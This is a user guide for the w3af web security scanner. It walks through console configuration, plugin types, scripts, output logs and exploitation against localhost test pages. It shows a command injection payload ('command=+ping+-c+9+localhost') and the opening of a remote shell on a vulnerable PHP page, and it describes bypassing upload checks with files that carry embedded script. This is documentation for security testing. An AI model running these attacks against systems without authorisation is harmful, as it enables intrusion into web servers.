| Configure w3af misc settings. |
| target | Configure the target URL. |
||
| back | Go to the previous menu. |
| exit | Exit w3af. |
| assert | Check assertion. |
||
| help | Display help. issuing: help [command]|
| | , prints more specific help about |
| | "command" |
| version | Show w3af version information. |
| keys | Display key shortcuts. |
||
w3af>>>
w3af>>> help target
Configure the target URL.
w3af>>>
The main menu commands are explained in the help that is displayed above.
The
internals of every menu will be seen later in this document. As you already
noticed, the help command can take a parameter, and if available, a
detailed
help for that parameter will be shown, e.g. help keys.
Other interesting things to notice about the consoleUI are the tab completion
(type 'plu' and then TAB) and the command history (after typing some
commands,
navigate the history with the up and down arrows).
To enter a configuration menu, you just have to type it's name and hit enter,
you
will see how the prompt changes and you are now in that context:
w3af>>> httpsettings
w3af/config:httpsettings>>>

All the configuration menus provide the following commands:
help
view
set
back

Here is a usage example of these commands in the http-settings menu:

w3af/config:httpsettings>>> help
|--------|----------------------------------------------|
| view   | List the available options and their values. |
| set    | Set a parameter value.                       |
|--------|----------------------------------------------|
| back   | Go to the previous menu.                     |
| exit   | Exit w3af.                                   |
| assert | Check assertion.                             |
|--------|----------------------------------------------|
w3af/config:httpsettings>>> view
|-------------------|-------|-------------------------------------------|
| Setting           | Value | Description                               |
|-------------------|-------|-------------------------------------------|
| timeout           | 10    | The timeout for connections to the HTTP   |
|                   |       | server                                    |
| headersFile       |       | Set the headers filename. This file has   |
|                   |       | additional headers that are added to each |
|                   |       | request.                                  |
|-------------------|-------|-------------------------------------------|
| ignoreSessCookies | False | Ignore session cookies                    |
| cookieJarFile     |       | Set the cookiejar filename.               |
|-------------------|-------|-------------------------------------------|
...
w3af/config:httpsettings>>> set timeout 5
w3af/config:httpsettings>>> view
...
| timeout           | 5     | The timeout for connections to the HTTP   |
...

To summarize, the view command is used to list all configurable parameters, with their values and a description. The set command is used to change a parameter's value. Finally we can execute back, type . or press CTRL+C to return to the previous menu. A detailed help for every configuration parameter can be obtained using help parameter, as shown in this example:

w3af/config:httpsettings>>> help timeout
Help for parameter timeout:
===========================
Set low timeouts for LAN use and high timeouts for slow Internet connections.
w3af/config:httpsettings>>>
The http-settings and the misc-settings configuration menus are used to set system wide parameters that are used by the framework. All the parameters have defaults and in most cases you can leave them as they are. w3af was designed in a way that allows beginners to run it without having to learn a lot of its internals, and is also flexible enough to be tuned by experts that know what they want and need to change internal configuration parameters to fulfill their tasks.

Running w3af with GTK user interface

The framework also has a graphical user interface that you can start by executing:

$ ./w3af_gui

The graphical user interface allows you to perform all the actions that the framework offers and features a much easier and faster way to start a scan and analyze the results. In case you are wondering what the graphical user interface looks like, here is a screen shot:
[screenshot of the w3af GTK user interface not reproduced]

Plugins

Plugins do all the magic. The plugins will find the URLs, discover the vulnerabilities and exploit them. So now, we will learn how to configure the plugins. In a previous section I told you that w3af had three types of plugins: discovery, audit and exploit. Well, I actually lied a little bit, because w3af has other plugin types. The complete list of plugin types is:
discovery
audit
grep
exploit
output
mangle
bruteforce
evasion

As said before, discovery plugins find new points of injection, that are later used by audit plugins to find vulnerabilities. Grep plugins analyze all page content and find vulnerabilities on pages that are requested by other plugins; for example a grep plugin will find a comment on the HTML body that has the word password inside it and generate a vulnerability based on it.

Exploit plugins [ab]use the vulnerabilities found in the audit phase and return something useful to the user ( remote shell, SQL table dump, a proxy, etc ).

Output plugins are the way the framework and the plugins communicate with the user; output plugins save the data to a text or html file. Debugging information is also sent to the plugins and can be saved for analysis.

Mangle plugins are a way to modify requests and responses based on regular expressions, think sed (stream editor) for the web.

Bruteforce plugins will bruteforce logins; they are actually part of the discovery phase.

Finally, evasion plugins try to evade simple intrusion detection rules.
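The grep-plugin idea from the list above (inspect every response the other plugins already fetched, send nothing extra), as an added example that is not a w3af plugin: it flags HTML comments mentioning credentials, which is exactly the kind of leak a developer wants to catch before shipping. The response bodies, the word list and the function names are constructed for illustration.

```python
"""Minimal grep-style check over already-fetched responses (added example, not w3af code)."""
import re

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
# Words that should never appear in a comment shipped to the browser (constructed list).
SENSITIVE = ("password", "passwd", "secret", "todo: remove")

# Constructed response bodies standing in for pages fetched by other plugins.
RESPONSES = {
    "http://localhost/app/login.php":
        "<html><!-- default password is changeme, TODO: remove --><form>...</form></html>",
    "http://localhost/app/about.html":
        "<html><!-- last updated 2008 --><p>About</p></html>",
}


def grep_comments(url, body):
    """Return one finding per HTML comment in body that contains a sensitive word."""
    findings = []
    for comment in COMMENT_RE.findall(body):
        lowered = comment.lower()
        hits = [word for word in SENSITIVE if word in lowered]
        if hits:
            findings.append({
                "url": url,
                "comment": " ".join(comment.split()),   # collapse whitespace for reporting
                "matched": hits,
            })
    return findings


def run_grep(responses=RESPONSES):
    """Apply the check to every response, like a grep plugin sees every page."""
    results = []
    for url, body in responses.items():
        results.extend(grep_comments(url, body))
    return results


if __name__ == "__main__":
    for finding in run_grep():
        print(f"{finding['url']}: comment matched {finding['matched']}: {finding['comment']}")
```

Because the check only reads bodies that were requested anyway, it costs no traffic; that is the property that makes grep plugins cheap to leave enabled.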

Plugin configuration

The plugins are configured using the plugins configuration menu. Let's see how to do that:

w3af>>> plugins
w3af/plugins>>> help
|------------|-----------------------------------------------|
| list       | List available plugins.                       |
|------------|-----------------------------------------------|
| back       | Go to the previous menu.                      |
| exit       | Exit w3af.                                    |
| assert     | Check assertion.                              |
|------------|-----------------------------------------------|
| mangle     | View, configure and enable mangle plugins     |
| evasion    | View, configure and enable evasion plugins    |
| discovery  | View, configure and enable discovery plugins  |
| grep       | View, configure and enable grep plugins       |
| bruteforce | View, configure and enable bruteforce plugins |
| audit      | View, configure and enable audit plugins      |
| output     | View, configure and enable output plugins     |
|------------|-----------------------------------------------|
w3af/plugins>>>

As you may have noticed, all plugins can be configured here except the exploit plugins; we will talk about them later. The first step to take here is to know the syntax for configuring the plugins, so let's do that:
w3af/plugins>>> help audit
View, configure and enable audit plugins
Syntax: audit [config plugin | plugin1[,plugin2 ... pluginN] | desc plugin]
Example: audit
Result: All enabled audit plugins are listed.
Example2: audit LDAPi,blindSqli
Result: LDAPi and blindSqli are configured to run
Example3: audit config LDAPi
Result: Enters to the plugin configuration menu.
Example4: audit all,!blindSqli
Result: All audit plugins are configured to run except blindSqli.
Example1: audit desc LDAPi
Result: You will get the plugin description
w3af/plugins>>> help list
List available plugins.
Syntax: list {plugin type} [all | enabled | disabled]
By default all plugins are listed.
w3af/plugins>>>

Ok, so w3af is nice enough to tell us how to use it. Now we will see how to get a list of the available plugins and their status:
w3af/plugins>>> list audit
|--------------|--------|------|-----------------------|
| Plugin name  | Status | Conf | Description           |
|--------------|--------|------|-----------------------|
| LDAPi        |        |      | Find LDAP injection   |
|              |        |      | bugs.                 |
| blindSqli    |        | Yes  | Find blind SQL        |
|              |        |      | injection             |
|              |        |      | vulnerabilities.      |
| buffOverflow |        |      | Find buffer overflow  |
|              |        |      | vulnerabilities.      |
| dav          |        |      | Tries to upload a     |
|              |        |      | file using HTTP PUT   |
|              |        |      | method.               |
| eval         |        |      | Finds incorrect usage |
|              |        |      | of the eval().        |
...

To enable the xss and sqli plugins, and then verify that the command was understood by the framework, we issue this set of commands:

w3af/plugins>>> audit xss, sqli
w3af/plugins>>> audit
|--------------|---------|------|-----------------------|
| Plugin name  | Status  | Conf | Description           |
|--------------|---------|------|-----------------------|
...
| sqli         | Enabled |      | Find SQL injection    |
|              |         |      | bugs.                 |
...
| xss          | Enabled | Yes  | Find cross site       |
|              |         |      | scripting             |
|              |         |      | vulnerabilities.      |
| xst          |         |      | Verify Cross Site     |
|              |         |      | Tracing               |
|              |         |      | vulnerabilities.      |
|--------------|---------|------|-----------------------|
w3af/plugins>>>
Or if the user is interested in knowing exactly what a plugin does, he can also run the desc command like this:
w3af>>> plugins
w3af/plugins>>> audit desc fileUpload
This plugin will try to expoit insecure file upload forms.
One configurable parameter exists:
extensions
The extensions parameter is a comma separated list of extensions
that this plugin will try to upload. Many web applications
verify the extension of the file being uploaded, if special
extensions are required, they can be added here.
Some web applications check the contents of the files being
uploaded to see if they are really what their extension
is telling. To bypass this check, this plugin uses file
templates located at "plugins/audit/fileUpload/", this templates
are valid files for each extension that have a section ( the
comment field in a gif file for example ) that can be replaced
by scripting code ( PHP, ASP, etc ).
After uploading the file, this plugin will try to find it on
common directories like "upload" and "files" on every know
directory. If the file is found, a vulnerability exists.
w3af/plugins>>>
Now we know what this plugin does, but let's check its internals:

w3af/plugins>>> audit config xss
w3af/plugins/audit/config:xss>>> view
|----------------|-------|--------------------------------|
| Setting        | Value | Description                    |
|----------------|-------|--------------------------------|
| numberOfChecks | 3     | Set the amount of checks to    |
|                |       | perform for each fuzzable      |
|                |       | parameter. Valid numbers: 1 to |
|                |       | 13                             |
| checkStored    | True  | Search persistent XSS          |
|----------------|-------|--------------------------------|
w3af/plugin/xss>>> set checkStored False
w3af/plugin/xss>>> back
w3af/plugins>>> audit config sqli
w3af/plugins/audit/config:sqli>>> view
|----------------|-------|--------------------------------|
| Setting        | Value | Description                    |
|----------------|-------|--------------------------------|
|----------------|-------|--------------------------------|
w3af/plugins/audit/config:sqli>>>
w3af/plugins/audit/config:sqli>>> back
w3af/plugins>>>

The configuration menus for the plugins also have the set command for changing the parameters' values, and the view command for listing existing values. In the previous example we disabled persistent cross site scripting checks in the xss plugin, and listed the options of the sqli plugin (it actually has no configurable parameters).

Starting a scan

After configuring all desired plugins the user has to set the target URL and finally start the scan. The target selection is done this way:

w3af>>> target
w3af/config:target>>> set target http://localhost/
w3af/config:target>>> back
w3af>>>

Finally, you execute start in order to run all the configured plugins.

w3af>>> start

At any time during the scan, you may hit enter in order to get a live status of the w3af core. Status lines look like this:

Status: Running discovery.webSpider on http://localhost/w3af/ | Method: GET.

A complete session

A complete w3af session would look like this ( see the inline comments ):

$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back

All these previous commands have enabled two output plugins, console and textFile, and configured them as needed.

w3af/plugins>>> discovery allowedMethods,webSpider
w3af/plugins>>> back

In this case, we will be running only discovery plugins. The enabled plugins are allowedMethods and webSpider.

w3af>>> target
w3af/target>>>set target http://localhost/w3af/
w3af/target>>>back
w3af>>> start
New URL found by discovery: http://localhost/w3af/responseSplitting/responseSplitting.php
New URL found by discovery: http://localhost/w3af/blindSqli/blindSqli-str.php
New URL found by discovery: http://localhost/w3af/webSpider/2.html
...
...
The URL: http://localhost/beef/hook/ has DAV methods enabled:
OPTIONS
GET
HEAD
POST
TRACE
PROPFIND
PROPPATCH
COPY
MOVE
LOCK
UNLOCK
DELETE ( is possibly enabled too, not tested for safety )
New URL found by discovery: http://localhost/w3af/globalRedirect/wargame/
New URL found by discovery: http://localhost/w3af/globalRedirect/w3afsite.tgz

After the discovery phase is finished a summary is presented to the user:

The list of found URLs is:
- http://localhost/w3af/globalRedirect/w3af.testsite.tgz
- http://localhost/beef/hook/beefmagic.js.php
- http://localhost/w3af/globalRedirect/2.php
- http://localhost/w3af/webSpider/11.html
...

A section of the summary is the points of injection that will be used in the audit phase:

Found 78 URLs and 102 different points of injection.
The list of Fuzzable requests is:
- http://localhost/w3af/ | Method: GET
- http://localhost/w3af/responseSplitting/responseSplitting.php | Method: GET | Parameters: (header)
- http://localhost/w3af/sqli/dataReceptor.php | Method: POST | Parameters: (user,firstname)

Finally the user exits the application, returning to the shell.

w3af>>> exit
w3af, better than the regular script kiddie.
$

A warning about discovery

The discovery phase is a double edged sword: use it with wisdom, and it will give you a lot of knowledge about the remote web application; use it in a greedy way and you will be waiting for hours until the discovery phase ends. Just to make things clear, the greedy way is to enable all discovery plugins ( discovery all ) without even knowing what you are doing or having manually browsed the web and understood its internals.

Some examples will make things clear:

You are testing an intranet web application, the web application is huge and doesn't use any macromedia flash or javascript code.
Recommendation: discovery all,!spiderMan, !fingerGoogle, !fingerMSN, !fingerPKS, !MSNSpider, !googleSpider, !phishtank, !googleSafeBrowsing.
Reason: spiderMan should only be used when webSpider can't find all links. The fingerGoogle, fingerMSN and fingerPKS plugins discover mail addresses from search engines; if this is an intranet application, the addresses put in this site won't be available in search engines because they never were indexed. MSNSpider and googleSpider find URLs using search engines; like the ones before, they are useless because search engines don't index private pages. phishtank and googleSafeBrowsing shouldn't be enabled because they search for phishing sites, and like the ones before them, private sites aren't indexed in these systems.

You are testing a web application over the internet, the web application is huge and doesn't use any macromedia flash or javascript code.
Recommendation: discovery all,!spiderMan, !wordnet, !googleSets.
Reason: spiderMan should only be used when webSpider can't find all links. The wordnet and googleSets plugins are two plugins that take a long time to run over the internet, so it's a good idea to disable them.

You are testing a web application over the internet, the web application is huge and has macromedia flash or javascript code. You also know that the application doesn't implement any web services.
Recommendation: discovery all, !wordnet, !googleSets, !wsdlFinder.
Reason: The wordnet and googleSets plugins are two plugins that take a long time to run over the internet, so it's a good idea to disable them. Regarding wsdlFinder, if we already know that no web services exist, why look for them?

You are testing a web application over the internet, the web application is huge, you really need to know all the links and functionality of the site and you don't care waiting.
Recommendation: discovery all.
Reason: You really need to get a lot of knowledge about the site and don't care if it takes a complete day.

When everything else fails...

So, you enabled only the recommended plugins in the discovery phase, you started the framework one hour ago, the discovery is still running and doesn't find anything. When you find yourself in this situation you have two options: waiting for w3af to finish, or hitting CTRL+C to finish the discovery and start with the audit phase.

You should also remember that if you are saving the debug information to a text file you can open a new terminal and run a tail -f w3af-output-file.txt to see what w3af is really doing.

w3af scripts

While developing w3af, I realized that I needed a fast way to execute the same steps over and over, so the script functionality was born. w3af can run a script file using the -s argument. Script files are text files with one command on each line. An example script file would look like this:

$ head scripts/script-osCommanding.w3af
# This is the osCommanding demo:
plugins
output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbose True
back

To run this script you would execute ./w3af_console -s scripts/script-osCommanding.w3af ; the output would look just like if you typed every command by hand in the console:

$ ./w3af_console -s scripts/script-osCommanding.w3af
w3af>>>plugins
w3af/plugins>>>output console,textFile
w3af/plugins>>>output
|-----------|---------|------|------------------------------|
| Plugin    | Status  | Conf | Description                  |
| name      |         |      |                              |
|-----------|---------|------|------------------------------|
| console   | Enabled | Yes  | Print messages to the        |
|           |         |      | console.                     |
| gtkOutput |         |      | Saves messages to            |
|           |         |      | kb.kb.getData('gtkOutput',   |
|           |         |      | 'queue'), messages are saved |
|           |         |      | in the form of objects.      |
| htmlFile  |         | Yes  | Print all messages to a HTML |
|           |         |      | file.                        |
| textFile  | Enabled | Yes  | Prints all messages to a     |
|           |         |      | text file.                   |
| webOutput |         |      | Print all messages to the    |
|           |         |      | web user interface this      |
|           |         |      | plugin and the web user      |
|           |         |      | interface are DEPRECATED.    |
|-----------|---------|------|------------------------------|
w3af/plugins>>>output config textFile
w3af/plugins/output/config:textFile>>>set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>>set verbose True
w3af/plugins/output/config:textFile>>>back
w3af/plugins>>>output config console
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>back
w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of available shells:
[0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19-generic i686 GNU/Linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell.
Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell0>>> ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell0>>> endInteraction
w3af/exploit>>>back
w3af>>>exit
spawned a remote shell today?
$
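The plugin selection syntax from the help audit text (audit xss, sqli / audit all,!blindSqli), the discovery recommendations above, and the one-command-per-line script files in this section share one mechanic: resolving a comma separated spec against the plugins that exist. The following is an added example, not w3af code, that resolves such specs and replays a script offline so its effect can be reviewed before anything is scanned. AVAILABLE is a constructed subset of plugin names, SAMPLE_SCRIPT is constructed after the layout of script-osCommanding.w3af, and replay_script models only the plugins menu.

```python
"""Plugin selection resolver and offline script replayer (added example, not w3af code)."""

# Constructed subset of plugin names per type; a real run would list them with `list <type>`.
AVAILABLE = {
    "discovery": ["webSpider", "allowedMethods", "spiderMan", "fingerGoogle",
                  "fingerMSN", "fingerPKS", "MSNSpider", "googleSpider",
                  "phishtank", "googleSafeBrowsing", "wordnet", "googleSets",
                  "wsdlFinder"],
    "audit": ["LDAPi", "blindSqli", "buffOverflow", "dav", "eval", "sqli",
              "xss", "xst", "osCommanding"],
    "output": ["console", "textFile", "htmlFile"],
}
MENUS = ("plugins", "target", "httpsettings", "miscsettings", "exploit")


def resolve_selection(spec, available):
    """Turn 'all,!a, !b' or 'x, y' into the set of plugins that would run.

    Tokens are comma separated and surrounding whitespace is ignored;
    'all' selects every plugin and '!name' removes one. An unknown name
    raises ValueError so a typo cannot silently drop a check from the scan.
    """
    enabled = set()
    for raw in spec.split(","):
        token = raw.strip()
        if not token:
            continue
        if token == "all":
            enabled.update(available)
            continue
        name = token[1:].strip() if token.startswith("!") else token
        if name not in available:
            raise ValueError(f"unknown plugin: {name!r}")
        if token.startswith("!"):
            enabled.discard(name)
        else:
            enabled.add(name)
    return enabled


def is_valid_selection(spec, available):
    """True when every name in spec exists; handy for linting a script before running it."""
    try:
        resolve_selection(spec, available)
        return True
    except ValueError:
        return False


def replay_script(lines, available=AVAILABLE):
    """Replay a script (one command per line, '#' lines are comments) without w3af.

    Returns the plugin sets the script leaves enabled and a trace of every
    other command (set, target, start) so a reviewer sees what it would do.
    """
    enabled = {ptype: set() for ptype in available}
    menu = []                                   # stack of entered menus
    trace = []
    for line in lines:
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        words = cmd.split(None, 1)
        if words[0] == "back":
            if menu:
                menu.pop()
        elif len(words) == 1 and words[0] in MENUS:
            menu.append(words[0])
        elif len(words) == 2 and menu and menu[-1] == "plugins" and words[0] in available:
            arg = words[1].strip()
            if arg.split()[0] in ("config", "desc"):
                if arg.startswith("config"):
                    menu.append(cmd)            # e.g. "output config textFile"
                trace.append(cmd)
            else:
                enabled[words[0]] = resolve_selection(arg, available[words[0]])
        else:
            trace.append(cmd)
    return enabled, trace


# Constructed script following the layout of script-osCommanding.w3af shown above.
SAMPLE_SCRIPT = """\
# osCommanding demo (constructed)
plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
audit osCommanding
back
target
set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
back
start
""".splitlines()

if __name__ == "__main__":
    enabled, trace = replay_script(SAMPLE_SCRIPT)
    for ptype, names in enabled.items():
        print(f"{ptype}: {sorted(names)}")
    print("other commands:", trace)
```

Resolving the intranet recommendation from the previous section against the constructed discovery list leaves exactly webSpider, allowedMethods, wordnet, googleSets and wsdlFinder enabled, which is a quick way to see what a long exclusion list actually keeps.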

The Output

All the output of w3af is managed by the output plugins. Each output plugin will write in a different format ( txt, html, etc ); for example the textFile plugin writes all output to the output-w3af.txt file by default. The configuration of these plugins is done just like other plugins, as seen before:

$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back

This will configure the textFile plugin to output all messages, including the debugging information ( see set verbose True ) to the output-w3af.txt file. Here is an example of what is written to this file:

[ Sun Sep 14 17:36:09 2008 - debug - w3afCore ] Exiting setOutputPlugins()
[ Sun Sep 14 17:36:09 2008 - debug - w3afCore ] Called w3afCore.start()
[ Sun Sep 14 17:36:09 2008 - debug - xUrllib ] Called buildOpeners
[ Sun Sep 14 17:36:09 2008 - debug - keepalive ] keepalive: The connection manager has 0 active connections.
[ Sun Sep 14 17:36:09 2008 - debug - keepalive ] keepalive: added one connection, len(self._hostmap["localhost"]): 1
[ Sun Sep 14 17:36:09 2008 - debug - httplib ] DNS response from DNS server for domain: localhost
[ Sun Sep 14 17:36:09 2008 - debug - xUrllib ] GET http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 returned HTTP code "200"

Output plugins also handle the logging of HTTP requests and responses; every plugin handles this data in a different way. For example, the textFile plugin writes requests and responses to a file, while the htmlFile plugin disregards the data and simply does nothing with it. An example of a HTTP log written by the textFile follows:

==========Request 4 - Sun Sep 14 17:36:12 2008==============
GET http://localhost/w3af/osCommanding/vulnerable.php?command=+ping+-c+4+localhost HTTP/1.1
Host: localhost
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
==========Response 4 - Sun Sep 14 17:36:12 2008==============
HTTP/1.1 200 OK
date: Sun, 14 Sep 2008 20:36:09 GMT
transfer-encoding: chunked
x-powered-by: PHP/5.2.4-2ubuntu5.3
content-type: text/html
server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch

PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.024 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.035 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.037 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.037 ms

--- localhost ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.024/0.033/0.037/0.006 ms
=============================================================

Just in case you are wondering, all messages sent by the plugins and the framework are sent to ALL enabled plugins, so if you have enabled the textFile and htmlFile output plugins, both will log a vulnerability found by an audit plugin.
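A parser for the two textFile layouts shown above (message lines and Request/Response blocks), as an added example that is not part of w3af: it turns the log into structured records and joins each reported finding to the request and response it names by id, which is what a reviewer needs to confirm a finding from the log alone. SAMPLE_LOG is constructed to follow those layouts with the " - " separators restored; the "vulnerability" level name is an assumption, since only "debug" lines appear on the page.

```python
"""Parser for w3af-style textFile output (added example, not w3af code)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt mirroring the message and HTTP log layouts shown above.
SAMPLE_LOG = """\
[ Sun Sep 14 17:36:09 2008 - debug - w3afCore ] Called w3afCore.start()
[ Sun Sep 14 17:36:09 2008 - debug - xUrllib ] GET http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 returned HTTP code "200"
[ Sun Sep 14 17:36:12 2008 - vulnerability - osCommanding ] OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The vulnerability was found in the request with id 5.
==========Request 5 - Sun Sep 14 17:36:12 2008==========
GET http://localhost/w3af/osCommanding/vulnerable.php?command=+ping+-c+4+localhost HTTP/1.1
Host: localhost
User-agent: w3af.sourceforge.net
==========Response 5 - Sun Sep 14 17:36:12 2008==========
HTTP/1.1 200 OK
content-type: text/html

PING localhost (127.0.0.1) 56(84) bytes of data.
==========================================================
"""

MESSAGE_RE = re.compile(r"^\[ (?P<ts>.+?) - (?P<level>\w+) - (?P<source>\S+) \] (?P<text>.*)$")
HTTP_HEADER_RE = re.compile(r"^=+(?P<kind>Request|Response) (?P<id>\d+) - (?P<ts>.+?)=+$")
BLOCK_END_RE = re.compile(r"^=+$")
REQUEST_ID_RE = re.compile(r"request with id (\d+)")


@dataclass
class Message:
    ts: str
    level: str
    source: str
    text: str


@dataclass
class HttpRecord:
    kind: str                       # "Request" or "Response"
    id: int
    ts: str
    lines: list = field(default_factory=list)


def parse_log(text):
    """Split the log into Message objects and {id: {"Request": ..., "Response": ...}}."""
    messages, http, current = [], {}, None
    for line in text.splitlines():
        header = HTTP_HEADER_RE.match(line)
        if header:
            current = HttpRecord(header["kind"], int(header["id"]), header["ts"])
            http.setdefault(current.id, {})[current.kind] = current
        elif current is not None and BLOCK_END_RE.match(line):
            current = None                          # closing "====" line of a block
        elif current is not None:
            current.lines.append(line)              # raw request/response line
        else:
            msg = MESSAGE_RE.match(line)
            if msg:
                messages.append(Message(msg["ts"], msg["level"], msg["source"], msg["text"]))
    return messages, http


def findings_with_evidence(text):
    """Join each non-debug message that names a request id to that request and response."""
    messages, http = parse_log(text)
    results = []
    for msg in messages:
        match = REQUEST_ID_RE.search(msg.text)
        if msg.level == "debug" or not match:
            continue
        rid = int(match.group(1))
        req = http.get(rid, {}).get("Request")
        resp = http.get(rid, {}).get("Response")
        results.append({
            "id": rid,
            "source": msg.source,
            "request_line": req.lines[0] if req and req.lines else None,
            "status_line": resp.lines[0] if resp and resp.lines else None,
        })
    return results


if __name__ == "__main__":
    for finding in findings_with_evidence(SAMPLE_LOG):
        print(f"[{finding['source']}] request {finding['id']}: "
              f"{finding['request_line']} -> {finding['status_line']}")
```

Because the request/response blocks carry the same id the finding message cites, the join needs no timestamps; a finding whose id has no matching block is still reported, with None in place of the missing evidence.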

Complex sites

Some sites use embedded objects, like macromedia flash and java applets, that the browser renders to the user. Because of the inability of the framework to get any information out of those objects, a script called spiderMan was created. This script will run a HTTP proxy so the user can navigate the target site through it; during this process the plugin will extract information from the requests and responses.

A simple example will clarify things: let's suppose that w3af is auditing a site and can't find any links on the main page. After a closer interpretation of the results by the user, it is clear that the main page has a java applet menu where all the other sections are linked. The user runs w3af once again and now activates the spiderMan plugin, navigates the site manually using the browser and the spiderMan proxy. When the user has finished his browsing, w3af will continue with all the hard auditing work.

The spiderMan plugin can be used when javascript, flash, java applets or any other browser side technology is present. This is a sample spiderMan plugin run:

w3af>>> plugins
w3af/plugins>>> discovery spiderMan
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/fileUpload/
w3af/target>>> back
w3af>>> start
spiderMan proxy is running on 127.0.0.1:44444 .
Please configure your browser to use these proxy settings and navigate the target site. To exit spiderMan plugin please navigate to http://127.7.7.7/spiderMan?terminate .

Now the user configures the browser to use the 127.0.0.1:44444 proxy and navigates the target site; after that he navigates to http://127.7.7.7/spiderMan?terminate and exits the spiderMan. The results are shown:

New URL found by discovery: http://localhost/w3af/test
New URL found by discovery: http://localhost/favicon.ico
New URL found by discovery: http://localhost/w3af/
New URL found by discovery: http://localhost/w3af/img/w3af.png
New URL found by discovery: http://localhost/w3af/xssforms/testforms.html
New URL found by discovery: http://localhost/w3af/xssforms/dataReceptor.php
The list of found URLs is:
- http://localhost/w3af/fileUpload/
- http://localhost/w3af/test
- http://localhost/w3af/xssforms/dataReceptor.php
- http://localhost/w3af/
- http://localhost/w3af/img/w3af.png
- http://localhost/w3af/xssforms/testforms.html
- http://localhost/w3af/fileUpload/uploader.php
- http://localhost/favicon.ico
Found 8 URLs and 8 different points of injection.
The list of Fuzzable requests is:
- http://localhost/w3af/fileUpload/ | Method: GET
- http://localhost/w3af/fileUpload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE,uploadedfile)
- http://localhost/w3af/test | Method: GET
- http://localhost/favicon.ico | Method: GET
- http://localhost/w3af/ | Method: GET
- http://localhost/w3af/img/w3af.png | Method: GET
- http://localhost/w3af/xssforms/testforms.html | Method: GET
- http://localhost/w3af/xssforms/dataReceptor.php | Method: POST | Parameters: (user,firstname)
Starting sqli plugin execution.
w3af>>>

Exploiting

Two ways of exploiting a vulnerability exist: the first one uses the vulnerabilities found by the audit phase, and the second one, which is called fastexploit, requires the user to enter the vulnerability parameters.

Let's see an example of the first way of exploiting a vulnerability with w3af:

w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of available shells:
[0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19-generic i686 GNU/Linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell.
Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell0>>> ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell0>>> endInteraction
w3af/exploit>>>back
w3af>>>

